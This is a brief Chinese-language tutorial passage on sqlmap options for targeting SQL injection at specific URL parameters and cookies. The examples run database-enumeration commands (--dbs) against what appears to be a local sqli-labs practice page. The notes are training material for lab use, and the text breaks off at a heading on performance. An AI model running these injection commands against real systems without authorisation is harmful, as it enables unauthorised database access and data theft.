一、指定位置注入
1、-p,指定具体探测的参数
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p "id,name" --dbs 对id和name都进行探测
2、--skip,忽略探测的参数
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测,这里忽略了host
3、--param-exclude,忽略包含具体内容的参数
--param-exclude="id|name"
4、--skip-static 忽略非动态参数
5、用“*”指定注入位置,
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="un=adm*;pw=adm"--dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"--dbs
二、优化性能
1